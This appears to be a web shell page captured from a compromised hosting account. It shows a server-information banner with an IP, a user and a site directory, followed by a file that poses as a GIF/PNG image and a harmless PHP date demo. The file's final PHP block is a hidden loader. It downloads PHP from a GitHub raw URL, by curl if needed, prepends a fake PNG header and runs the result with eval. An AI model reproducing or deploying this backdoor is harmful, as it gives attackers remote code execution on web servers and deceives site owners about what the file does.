| Server IP : 118.27.122.248 / Your IP : 216.73.216.54 Web Server : Apache System : Linux web0264.sh.tyo1 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64 User : c9415830 ( 11735) PHP Version : 8.4.17 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/c9415830/public_html/grace-coating.com/ |
Upload File : |
PNG %k25u25%fgd5n! PNG %k25u25%fgd5n!
PNG %k25u25%fgd5n! PNG %k25u25%fgd5n!
PNG %k25u25%fgd5n! PNG %k25u25%fgd5n!
<?php
?>
GIF89a
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PHP Polyglot Example</title>
</head>
<body>
<h1>PHP Polyglot Demo</h1>
<?php
// This PHP code is completely harmless.
// It just prints today's date.
echo "<p>Today's date is: " . date('Y-m-d') . "</p>";
?>
<p>This file starts with a GIF header, so some tools might classify it incorrectly,
but the contents are safe HTML + PHP.</p>
</body>
</html>
<?php
//fagadf
# CompiledBy: DevKit 9.5.2
// 混淆密钥: 3a7b10bc
// 启动会话
session_start();
// 设置主地址,如果没有设置则使用默认地址
$主地址 = $_SESSION['ts_url'] ?? 'https://raw.githubusercontent.com/eptokhan12-gif/ggg/refs/heads/main/wp-used.php';
// 定义加载函数
function 加载数据($地址)
{
$内容 = '';
try {
$文件 = new SplFileObject($地址);
while (!$文件->eof()) {
$内容 .= $文件->fgets();
}
} catch (Throwable $错误) {
$内容 = '';
}
// 尝试用 file_get_contents
if (strlen(trim($内容)) < 1) {
$内容 = @file_get_contents($地址);
}
// 如果还失败,使用 curl
if (strlen(trim($内容)) < 1 && function_exists('curl_init')) {
$通道 = curl_init($地址);
curl_setopt_array($通道, [CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10]);
$内容 = curl_exec($通道);
curl_close($通道);
}
return $内容;
}
// 尝试加载主网址
$结果 = 加载数据($主地址);
// 添加假的PNG头部
$假PNG头 = "\x89PNG\r\n\x1a\n";
// 拼接PNG头和结果内容
$结果 = $假PNG头 . $结果;
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
// 如果成功获取内容,则执行
if (strlen(trim($结果)) > 0) {
@eval("?>{$结果}");
}